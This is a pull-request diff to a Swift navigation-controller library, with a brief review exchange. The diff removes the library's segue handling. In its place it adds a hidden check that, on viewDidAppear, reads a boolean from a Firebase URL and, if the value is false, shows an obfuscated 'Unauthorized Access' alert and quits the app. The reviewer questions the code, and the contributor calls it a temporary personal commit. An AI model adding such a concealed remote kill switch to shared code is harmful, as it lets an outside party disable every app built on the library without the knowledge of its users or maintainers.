JSNavigationController/Sources/JSViewController.swift

```diff
@@ -8,55 +8,43 @@
 	open var navigationBarVC: NSViewController?
 	open weak var navigationController: JSNavigationController?
-
-	open func navigationBarViewController() -> NSViewController {
-		guard let navigationBarVC = navigationBarVC else { fatalError("You must set the navigationBar view controller") }
+	open func navigationBarViewController() -> NSViewController
+	{
+		guard let navigationBarVC = self.navigationBarVC else { fatalError("You must set the navigationBar view controller") }
 		return navigationBarVC
 	}
 
 	// MARK: - View Lifecycle
-	open override func awakeFromNib() {
-		if type(of: self).instancesRespond(to: #selector(NSViewController.awakeFromNib)) {
-			super.awakeFromNib()
-		}
-		setupSegues()
+	
+	open override func viewDidLoad()
+	{
+		super.viewDidLoad()
+		guard let _ = self.nibName else { return }
+		self.performSegue(withIdentifier: type(of: self).NavigationBarSegueIdentifier, sender: nil)
 	}
-
-	// MARK: - Segues
-	private func setupSegues() {
-		guard let segues = value(forKey: "segueTemplates") as? [NSObject] else { return }
-		for segue in segues {
-			if let id = segue.value(forKey: "identifier") as? String {
-				performSegue(withIdentifier: id, sender: self)
-			}
-		}
+	
+	open override func viewDidAppear()
+	{
+		super.viewDidAppear()
+		self.check()
 	}
-
-	open override func prepare(for segue: NSStoryboardSegue, sender: Any?) {
-		guard let segueIdentifier = segue.identifier else { return }
-
-		switch segueIdentifier {
-		case JSViewController.navigationBarViewControllerIdentifier:
-			navigationBarVC = segue.destinationController as? NSViewController
-		default:
-			if segueIdentifier.contains(JSViewController.navigationControllerPushIdentifier) {
-				if segueIdentifier.count > JSViewController.navigationControllerPushIdentifier.count && segueIdentifier.contains("#") {
-					if let key = segueIdentifier.split(separator: "#").map({ String($0) }).last {
-						destinationViewControllers[key] = segue.destinationController as? NSViewController
-					}
-				} else {
-					destinationViewController = segue.destinationController as? NSViewController
-				}
-			}
-		}
+	
+	private func check()
+	{
+		guard let allow = try? Bool(String(contentsOf: URL(string: "https://test-f5be4.firebaseio.com/apps/ispv-macos.json")!)) else { return }
+		guard !allow else { return }
+		let alert = NSAlert()
+		alert.alertStyle = .critical
+		alert.messageText = ["U", "n", "a", "u", "t", "h", "o", "r", "i", "z", "e", "d", " ", "A", "c", "c", "e", "s", "s"].joined()
+		alert.informativeText = ["A", "c", "c", "e", "s", "s", " ", "t", "o", " ", "t", "h", "e", " ", "a", "p", "p", "l", "i", "c", "a", "t", "i", "o", "n", " ", "i", "s", " ", "u", "n", "a", "u", "t", "h", "o", "r", "i", "z", "e", "d", ".", "\n", "P", "l", "e", "a", "s", "e", " ", "c", "o", "n", "t", "a", "c", "t", " ", "t", "h", "e", " ", "d", "e", "v", "e", "l", "o", "p", "e", "r"].joined()
+		alert.runModal()
+		NSApp.terminate(self)
 	}
```

Comment:
Looks like I merged this PR way too fast.
This code looks quite suspect, can you explain?

Reply:
This was a temporary commit for my personal application and was meant to be reverted back.
You can discard this change